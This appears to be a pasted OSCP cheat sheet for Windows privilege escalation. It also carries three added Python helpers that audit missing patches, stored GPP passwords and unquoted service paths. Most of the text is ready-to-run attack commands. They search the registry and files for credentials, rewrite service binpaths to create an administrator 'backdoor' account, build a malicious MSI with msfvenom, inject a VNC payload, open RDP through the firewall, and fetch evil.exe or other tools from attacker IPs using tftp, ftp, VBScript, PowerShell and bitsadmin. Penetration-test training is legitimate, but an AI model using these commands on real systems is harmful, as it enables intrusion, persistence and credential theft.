UY-Scuti

Windows Priv Escalation

Dec 18th, 2018
OSCP - Windows Privilege Escalation
Information Gathering
+ What system are we connected to?

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

+ Get the hostname and username (if available)

hostname
echo %username%

+ Learn about your environment

SET
echo %PATH%

+ List other users on the box

net users
net user <username>

+ Networking/Routing Info

ipconfig /all
route print
arp -a

+ Active Network Connections

netstat -ano

+ Firewall Status (only on Win XP SP2 and above)

netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all

+ Scheduled tasks

schtasks /query /fo LIST /v

+ Check how running processes link to started services

tasklist /SVC

+ Windows services that are started:

net start

+ Driver madness (3rd party drivers may have holes)

DRIVERQUERY

+ Check systeminfo output against exploit-suggester

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

+ Run windows-privesc script

https://github.com/pentestmonkey/windows-privesc-check

WMIC
Windows Management Instrumentation Command Line
Windows XP requires admin
+ Use wmic_info.bat script for automation

http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar

+ System Info

wmic COMPUTERSYSTEM get TotalPhysicalMemory,caption
wmic CPU Get /Format:List

+ Check patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799).
After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing.
Search the installed patches for a given KB:

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

Examples:

Windows 2K SP4 - Windows 7 (x86): KiTrap0D (KB979682)

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"

Windows Vista/2008 6.1.6000 x32, Windows Vista/2008 6.1.6001 x32, Windows 7 6.2.7600 x32, Windows 7/2008 R2 6.2.7600 x64 (no good exploit - unlikely: Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"

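The findstr checks above test one KB at a time. The following is an added example (Python, not part of the original paste) that does the same comparison offline against a saved copy of the wmic qfe output: it pulls every HotFixID out of the listing and reports which of the KBs named in the text are absent. The sample listing is constructed, not captured from a real host, and the exploit-to-KB mapping is exactly the one stated above. The same regex also works on the "Hotfix(s):" block of systeminfo output.

```python
import re
from typing import Dict, List, Set

# Exploit-to-patch mapping as listed in the text above.
PRIVESC_PATCHES: Dict[str, str] = {
    "KB979682": "KiTrap0D",
    "KB2393802": "MS11-011",
    "KB982799": "MS10-059",
    "KB979683": "MS10-021",
    "KB2592799": "MS11-080",
}

# Only upper-case "KB<digits>" tokens count, so the lower-case "kbid=" fragment
# in the Caption column is not mistaken for a hotfix id.
KB_TOKEN = re.compile(r"\bKB\d+\b")

# Constructed sample of `wmic qfe get Caption,Description,HotFixID,InstalledOn`
# output (not captured from a real host).
SAMPLE_WMIC_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=979683   Security Update  KB979683   4/13/2010
http://support.microsoft.com/?kbid=2592799  Security Update  KB2592799  10/12/2011
"""


def installed_hotfixes(listing: str) -> Set[str]:
    """Return every KB id present in wmic qfe output. The same regex works on
    the 'Hotfix(s):' block of `systeminfo`, which prints one '[nn]: KBxxxxxx'
    line per update."""
    return set(KB_TOKEN.findall(listing))


def missing_patches(listing: str, wanted: Dict[str, str] = PRIVESC_PATCHES) -> List[str]:
    """KB ids from `wanted` that do not appear in the listing, in the order of
    `wanted`. An absent KB means only that this specific update id is not
    listed; a later cumulative or superseding update may still cover the issue,
    so treat the result as a candidate list to verify, not proof of exposure."""
    present = installed_hotfixes(listing)
    return [kb for kb in wanted if kb not in present]


def report(listing: str, wanted: Dict[str, str] = PRIVESC_PATCHES) -> List[str]:
    """Human-readable lines, one per wanted KB, marking present or missing."""
    present = installed_hotfixes(listing)
    return [
        f"{kb:<10} {name:<10} {'present' if kb in present else 'MISSING'}"
        for kb, name in wanted.items()
    ]


if __name__ == "__main__":
    for line in report(SAMPLE_WMIC_QFE):
        print(line)
```

Save the wmic output on the target (wmic qfe get Caption,Description,HotFixID,InstalledOn > qfe.txt) and feed the file's contents to missing_patches; add further KB/exploit pairs to PRIVESC_PATCHES as needed.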
Stored Credentials

Directories that contain the configuration files (but better check the entire filesystem). These files contain passwords either in clear text or Base64-encoded.

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

When the box is connected to a Domain:
Look for Groups.xml in SYSVOL
GPO preferences can be used to create local users on domain machines, so passwords might be stored there. Any authenticated user has read access to this file. The passwords are encrypted with AES, but the static key is published on the MSDN website, so they can be decrypted.
Search for other policy preference files that can have the optional "cPassword" attribute set:

Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes

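Added example (Python, not part of the original paste): an audit scanner for the preference files listed above. It walks every element of each XML file and reports the file, element and account for any element carrying the cPassword attribute, without touching the encrypted value, so an administrator can locate and remove the offending preferences (or a tester can confirm the finding without a Metasploit session). The sample XML is constructed; the attribute is matched case-insensitively because the files on disk write it as "cpassword". The scan_directory helper and the list of account-naming attributes are assumptions for this example.

```python
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Preference files named in the list above that may carry the attribute.
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "Printers.xml", "Drives.xml", "DataSources.xml")

# Attributes the different preference elements use to name the account
# (assumed set for this example).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")


def find_cpassword(xml_text: str, source: str) -> List[Dict[str, str]]:
    """One finding per element carrying a cPassword attribute.

    The attribute name is compared case-insensitively because the files on disk
    write it as 'cpassword'. The encrypted value is not returned: an audit needs
    the location and account so the preference can be removed, not the secret.
    """
    findings: List[Dict[str, str]] = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if not any(attr.lower() == "cpassword" for attr in elem.attrib):
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
        findings.append({"file": source, "element": elem.tag, "account": account})
    return findings


def scan_directory(root_dir: str) -> List[Dict[str, str]]:
    """Walk a directory (e.g. a copy of SYSVOL) and scan the known file names.
    Files that fail to parse are reported rather than silently skipped."""
    results: List[Dict[str, str]] = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8-sig") as fh:  # preference files carry a BOM
                text = fh.read()
            try:
                results.extend(find_cpassword(text, path))
            except ET.ParseError:
                results.append({"file": path, "element": "<unparseable>", "account": "?"})
    return results


# Constructed samples (not real policy files): a Groups.xml that creates a
# local user with a stored password, a ScheduledTasks.xml whose task runs as a
# named account with a stored password, and a Drives.xml without one.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="localadmin">
    <Properties action="C" userName="localadmin" cpassword="CONSTRUCTED_PLACEHOLDER"/>
  </User>
</Groups>"""

SAMPLE_TASKS_XML = """<ScheduledTasks>
  <Task name="Backup">
    <Properties runAs="CORP\\svc_backup" cpassword="CONSTRUCTED_PLACEHOLDER"/>
  </Task>
</ScheduledTasks>"""

SAMPLE_DRIVES_XML = """<Drives>
  <Drive name="H:"><Properties action="U" path="\\\\fileserver\\home"/></Drive>
</Drives>"""


def scan_samples() -> List[Dict[str, str]]:
    """Run the scanner over the constructed samples."""
    findings: List[Dict[str, str]] = []
    for name, text in (("Groups.xml", SAMPLE_GROUPS_XML),
                       ("ScheduledTasks.xml", SAMPLE_TASKS_XML),
                       ("Drives.xml", SAMPLE_DRIVES_XML)):
        findings.extend(find_cpassword(text, name))
    return findings


if __name__ == "__main__":
    for f in scan_samples():
        print(f"{f['file']}: <{f['element']}> account={f['account']}")
```

Point scan_directory at a mounted or copied SYSVOL share; every finding is a preference that should be deleted and its account's password rotated, since the stored value is readable by any authenticated user.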
Automated Tools
Metasploit Module

post/windows/gather/credentials/gpp
post/windows/gather/enum_unattend

PowerSploit

https://github.com/PowerShellMafia/PowerSploit
Get-GPPPassword
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon

Search filesystem:
Search for specific keywords:

dir /s *pass* == *cred* == *vnc* == *.config*

Search certain file types for a keyword

findstr /si password *.xml *.ini *.txt

Search for certain files

dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini

Grep the registry for keywords (e.g. "password")

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

Find writeable files

dir /a-r-d /s /b

/a selects by attribute: r is read-only and d is directory, and the minus signs negate those attributes, so we are listing writable files only.
/s recurses into subdirectories.
/b is bare format: path and filename only.

Trusted Service Paths

List all unquoted service paths (minus built-in Windows services) on our compromised machine:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Suppose we found:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

If you look at the registry entry for this service with Regedit you can see the ImagePath value is:

C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

To be secure it should be quoted, like this:

"C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe"

When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it finds:

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program Folder\A.exe
...

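Added example (Python, not part of the original paste) that generalises the lookup order just listed: service_path_candidates enumerates every space-delimited prefix of an unquoted path (the list above elides some of them behind "..."), and unquoted_auto_services applies the same filters as the findstr chain to a saved wmic listing. Assumptions: the listing is produced with /format:csv rather than the default table layout (easier to parse offline), the sample rows are constructed, and only the part of the path up to the first ".exe" is considered, since trailing arguments do not create an ambiguity. The output is the audit list an administrator quotes, as the text recommends.

```python
import csv
import io
from typing import Dict, List


def executable_head(image_path: str) -> str:
    """Portion of an unquoted ImagePath up to and including the first '.exe'.
    Anything after it is arguments, which never create a lookup ambiguity."""
    idx = image_path.lower().find(".exe")
    return image_path if idx < 0 else image_path[: idx + 4]


def service_path_candidates(image_path: str) -> List[str]:
    """Paths Windows tries, in order, when starting a service whose ImagePath
    is unquoted and contains spaces: every prefix that ends at a space, with
    '.exe' appended, and finally the intended executable. A quoted path or a
    path whose executable part has no spaces yields no candidates."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    head = executable_head(image_path)
    if " " not in head:
        return []
    words = head.split(" ")
    candidates = [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]
    candidates.append(head)
    return candidates


def unquoted_auto_services(wmic_csv: str) -> List[Dict[str, object]]:
    """Mirror the findstr chain above on CSV output: keep Auto-start services,
    skip anything under C:\\Windows, skip quoted paths, and report the services
    whose executable path still contains a space along with the lookup order.
    Assumes output from `wmic service get name,pathname,startmode /format:csv`."""
    reader = csv.DictReader(io.StringIO(wmic_csv.strip()))
    flagged: List[Dict[str, object]] = []
    for row in reader:
        path = (row.get("PathName") or "").strip()
        if row.get("StartMode") != "Auto" or not path:
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue
        candidates = service_path_candidates(path)
        if candidates:
            flagged.append({"name": row["Name"], "path": path, "candidates": candidates})
    return flagged


# Constructed sample (not captured from a real host). wmic's CSV writer wraps a
# value containing quotes in quotes and doubles the inner ones, which is how
# the already-quoted GoodSvc path appears.
SAMPLE_WMIC_CSV = r'''
Node,Name,PathName,StartMode
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,VulnSvc,C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe,Auto
HOST1,GoodSvc,"""C:\Program Files\Vendor\Good Service\svc.exe""",Auto
HOST1,ArgsSvc,C:\Vendor\agent.exe -k service,Auto
HOST1,ManualSvc,C:\Program Files\Other\manual thing.exe,Manual
'''


if __name__ == "__main__":
    for svc in unquoted_auto_services(SAMPLE_WMIC_CSV):
        print(f"{svc['name']}: {svc['path']}")
        for candidate in svc["candidates"]:
            print("   ", candidate)
```

For the page's example path the function yields five candidates (C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Program.exe, C:\Program Files (x86)\Program Folder\A.exe, then the real executable); each directory that has to hold one of those names is what the icacls check below should be run against, and the remediation is to quote the ImagePath.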
Check permissions of folder path

icacls "C:\Program Files (x86)\Program Folder"

If we can write in the path, we plant a backdoor with the same name as the service and restart the service.

Metasploit module:

exploit/windows/local/trusted_service_path

Vulnerable Services
Search for services that have a binary path (binpath) property which can be modified by non-Admin users - in that case change the binpath to execute a command of your own.
Note: Windows XP shipped with several vulnerable built-in services.
Use accesschk from SysInternals to search for these vulnerable services.

https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx

For Windows XP, version 5.2 of accesschk is needed:

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\

Then query the service using Windows sc:

sc qc <vulnerable service name>

Then change the binpath to execute your own commands (a restart of the service will most likely be needed):

sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>

Note - Might need to use the depend attribute explicitly:

sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>

Metasploit module:

exploit/windows/local/service_permissions

AlwaysInstallElevated
AlwaysInstallElevated is a policy setting that allows non-privileged users to run Microsoft Windows Installer packages (MSI) with elevated (SYSTEM) permissions.
Check if these 2 registry values are set to "1":

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If they are, create your own malicious msi:

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

Then use msiexec on the victim to execute your msi:

msiexec /quiet /qn /i C:\evil.msi

Metasploit module:

exploit/windows/local/always_install_elevated

Bypassing AV

Use Veil-Evasion
Create your own executable by "compiling" PowerShell scripts
Use Metasploit to substitute custom EXE and MSI binaries. You can set EXE::Custom or MSI::Custom to point to your binary prior to executing the module.

Getting GUI
+ Using meterpreter, inject a VNC session:

run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false

+ Enable RDP:

netsh firewall set service RemoteDesktop enable

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

sc config TermService start= auto
net start TermService
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"

OR:

netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp

netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=udp

(The doubled %% in program= is batch-file escaping; typed at an interactive prompt it must be a single %SystemRoot%.)

OR (meterpreter):

run post/windows/manage/enable_rdp

https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
Python exploits
Compiling Python Exploits for Windows on Linux

Install the Windows build of PyInstaller under Wine on Kali, then:

wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py

Run `pyinstaller`, located in the Python Scripts directory:

wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py

Execute with wine:

wine ~/.wine/drive_c/dist/HelloWorld.exe

File Transfers
Commands run through the obtained shell must be non-interactive.
https://blog.netspi.com/15-ways-to-download-a-file/
TFTP
Windows XP and Windows 2003 contain a tftp client. Windows 7 does not by default.
tftp clients are usually non-interactive, so they work through an obtained shell.

atftpd --daemon --port 69 /tftp

Windows> tftp -i 192.168.30.45 GET nc.exe

FTP
Windows contains an FTP client, but it is usually interactive.
Solution: scripted parameters in the ftp client: ftp -s
ftp-commands (note the space before ">" on the first line: cmd would otherwise read "1>" as a handle redirection and write "open 192.168.30.5 2" to the file)

echo open 192.168.30.5 21 > ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

VBScript
wget.vbs via the echo trick again; copy and paste the commands into the shell

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.102/evil.exe test.txt

PowerShell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.102/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

WebDAV
On Kali Linux install wsgidav and cheroot:

pip install wsgidav cheroot

Start wsgidav on a restricted folder:

mkdir /tmp/webdav_folder
wsgidav --host=0.0.0.0 --port=80 --root=/tmp/webdav_folder

On Windows mount this folder using net use:

net use * http://YOUR_IP_ADDRESS/

Reference: https://github.com/mar10/wsgidav
BitsAdmin

bitsadmin /transfer n http://domain/file c:%homepath%file

debug.exe
First use upx or similar to compress the executable:

upx -9 nc.exe

Then use exe2bat to convert the executable into a series of echo commands that are meant to be copied and pasted into the remote system:

wine exe2bat.exe nc.exe nc.txt

Then copy and paste each command from nc.txt into the remote system. The commands gradually rebuild the executable on the target machine.
certutil

certutil.exe -URL

will fetch ANY file and download it here:

C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content